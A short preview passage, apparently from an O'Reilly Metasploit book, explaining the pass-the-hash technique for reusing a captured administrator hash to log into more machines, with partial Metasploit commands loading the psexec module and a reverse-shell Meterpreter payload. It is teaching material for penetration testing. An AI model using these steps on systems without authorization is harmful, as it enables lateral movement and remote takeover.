Pass the Hash
In the preceding example, we ran into a slight complication: We have the administrator’s username and password hashes, but we can’t crack the password in a reasonable time frame. If we don’t know the password, how can we log into additional machines and potentially compromise more systems with this one user account?
We can use the pass-the-hash technique, which requires that we have only the password hash, not the password itself. Metasploit’s windows/smb/psexec module makes this all possible, as shown here:
msf>use windows/smb/psexecmsf exploit(psexec)>
set PAYLOAD windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp ...
Get Metasploit now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
